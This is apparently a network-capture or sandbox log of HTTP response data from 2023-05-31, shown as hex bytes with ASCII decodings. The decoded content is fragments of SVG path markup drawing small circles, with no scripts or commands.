                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7577INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7593INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7609INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                                                        Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7625INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                                                        Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7641INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7657INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                                                        Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7673INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                                                        Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7689INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7705INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7721INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7737INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                        Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7753INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                                        Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7769INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7785INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7801INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                                                        Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7817INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:13 UTC7833INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
